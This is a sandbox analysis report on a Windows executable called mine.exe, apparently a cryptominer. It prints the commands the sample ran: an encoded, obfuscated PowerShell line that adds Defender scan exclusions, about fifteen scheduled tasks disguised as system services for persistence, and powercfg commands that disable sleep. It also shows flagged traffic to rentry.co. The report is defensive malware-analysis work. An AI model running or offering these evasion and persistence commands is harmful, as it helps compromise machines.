Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Dec. 21, 2022, 9:45 a.m.	Dec. 21, 2022, 9:47 a.m.

Size	401.5KB
Type	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
MD5	`1b1bae0b503d1aa9d659db31ed2cd208`
SHA256	`8beea44520f307488f94d04241245ac943e2013f165308bac4277efae326c060`
CRC32	`BDE49BD8`
ssdeep	`6144:YKdKe+GXmr07DPIE5e20BnJSpY2vGo/WEVSMofYZzPtWMIvA1h7OHpjo9KK:YOkFr07d5e5gVLVPtW/Y1h7mp`
Yara	IsPE32 - (no description) OS_Processor_Check_Zero - OS Processor Check PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file

mine.exe "C:\Users\test22\AppData\Local\Temp\mine.exe"
1344
cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFkAVQB6AFgAYwBqAGUAWgBKAFQASwByACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQgBFAFQATQBTAGYAdgBBAHYAbABqAGkAUQByAEYAcwBSAE4AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAGgAeABhAHEAVAB3AGEAZwBWAHYAZgAjAD4AIABAACgAIAA8ACMAZQBHAFcAQgBRAEQATABDAHoATgBRAFUAQwAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZgBqAEgARQBtAGYATABZAEYASABxAGwAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAGQAUQBDAHMAZQBwAEYAdQBnAHoAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBSAEYAVwBFAEwAbwBCAFkAWgBjAFcAdgBaAGkAQwBXAFAAVABPACMAPgA="
2760
- powershell.exe powershell -EncodedCommand "PAAjAFkAVQB6AFgAYwBqAGUAWgBKAFQASwByACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQgBFAFQATQBTAGYAdgBBAHYAbABqAGkAUQByAEYAcwBSAE4AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAGgAeABhAHEAVAB3AGEAZwBWAHYAZgAjAD4AIABAACgAIAA8ACMAZQBHAFcAQgBRAEQATABDAHoATgBRAFUAQwAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZgBqAEgARQBtAGYATABZAEYASABxAGwAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAGQAUQBDAHMAZQBwAEYAdQBnAHoAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBSAEYAVwBFAEwAbwBCAFkAWgBjAFcAdgBaAGkAQwBXAFAAVABPACMAPgA="
  2816
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2924
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
  2980
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
3020
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
  1836
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2108
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
  2264
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2252
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
  2300
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2052
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
  1692
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2716
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
  2392
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2860
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
  2712
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
3036
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
  2156
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk328" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
1700
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk328" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
  2292
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk115" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2420
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk115" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
  2772
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2056
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
  2432
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk237" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2956
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk237" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
  2744
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2164
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
  2488
cmd.exe "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
1792
- powercfg.exe powercfg /x -hibernate-timeout-ac 0
  2776
- powercfg.exe powercfg /x -hibernate-timeout-dc 0
  2736
- powercfg.exe powercfg /x -standby-timeout-ac 0
  1228
- powercfg.exe powercfg /x -standby-timeout-dc 0
  3024
- powercfg.exe powercfg /hibernate off
  2668
- schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
  1984

Name	Response	Post-Analysis Lookup
apps.identrust.com	A 61.111.58.35 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 61.111.58.34	23.216.159.81
www.google.com	A 142.250.199.100	142.250.206.196
rentry.co	A 107.189.8.5	107.189.8.5

IP Address	Status	Action
107.189.8.5	Active	Moloch
142.250.199.100	Active	Moloch
164.124.101.2	Active	Moloch
61.111.58.34	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49166 -> 107.189.8.5:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49164 -> 142.250.199.100:80	2036303	ET HUNTING Terse Unencrypted Request for Google - Likely Connectivity Check	A Network Trojan was detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.103:49166 107.189.8.5:443	C=US, O=Let's Encrypt, CN=R3	CN=rentry.co	2d:32:02:f6:8b:05:00:17:50:4e:3e:07:e6:23:ea:b6:6a:9a:b8:34

Queries for the computername (20 events)

Time & API	Arguments	Status	Return
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 21, 2022, 9:46 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (6 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 21, 2022, 9:46 a.m.			0	0
IsDebuggerPresent Dec. 21, 2022, 9:46 a.m.			0	0
IsDebuggerPresent Dec. 21, 2022, 9:46 a.m.			0	0
IsDebuggerPresent Dec. 21, 2022, 9:46 a.m.			0	0
IsDebuggerPresent Dec. 21, 2022, 9:46 a.m.			0	0
IsDebuggerPresent Dec. 21, 2022, 9:46 a.m.			0	0

Command line console output was observed (25 events)

Time & API	Arguments	Status	Return
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: At line:1 char:34 console_handle: 0x00000047	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: + <#YUzXcjeZJTKr#> Add-MpPreference <<<< <#BETMSfvAvljiQrFsRN#> -ExclusionPath console_handle: 0x00000053	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: <#hxaqTwagVvf#> @( <#eGWBQDLCzNQUC#> $env:UserProfile, <#fjHEmfLYFHql#> $env:P console_handle: 0x0000005f	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: rogramData) <#dQCsepFugzc#> -Force <#RFWELoBYZcWvZiCWPTO#> console_handle: 0x0000006b	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x00000077	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: mmandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000008f	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: SUCCESS: The scheduled task "SecurityHealthSystray" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: SUCCESS: The scheduled task "WindowsDefender" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: SUCCESS: The scheduled task "WmiPrvSE" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: SUCCESS: The scheduled task "AntiMalwareServiceExecutable" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: SUCCESS: The scheduled task "RuntimeBroker" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: SUCCESS: The scheduled task "MicrosoftEdgeUpd" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: SUCCESS: The scheduled task "OneDriveService" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: SUCCESS: The scheduled task "NvStray" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: SUCCESS: The scheduled task "WindowsDefenderServices\WindowsDefenderServicesServices_bk328" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: SUCCESS: The scheduled task "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk115" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: SUCCESS: The scheduled task "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk248" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: SUCCESS: The scheduled task "SettingSysHost\SettingSysHostServices_bk237" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: SUCCESS: The scheduled task "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: Hibernation failed with the following error: The request is not supported. The following items are preventing hibernation on this system. The system firmware does not support hibernation. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 21, 2022, 9:46 a.m.	buffer: SUCCESS: The scheduled task "ActivationRule" has successfully been created. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c8ff8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451d20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 21, 2022, 9:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00451f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 21, 2022, 9:46 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Dec. 21, 2022, 9:45 a.m.	stacktrace: mine+0x1386 @ 0x131386 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 60 15 13 00 a0 55 13 00 00 00 00 00 00 00 00 00 exception.instruction: pushal exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x881d70 registers.esp: 5830636 registers.edi: 3604480 registers.eax: 8920432 registers.ebp: 5831336 registers.edx: 262144 registers.ebx: 512 registers.esi: 1649184 registers.ecx: 1971270096	1	0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET http://www.google.com/

Performs some HTTP requests (2 events)

request	GET http://www.google.com/
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c

Allocates read-write-execute memory (usually to unpack itself) (50 out of 178 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Dec. 21, 2022, 9:45 a.m.	process_identifier: 1344 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00192000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:45 a.m.	process_identifier: 1344 region_size: 401408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00310000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76bd1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x756f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f321000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75291000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f311000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f251000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f2f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f231000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70061000 process_handle: 0xffffffff	1
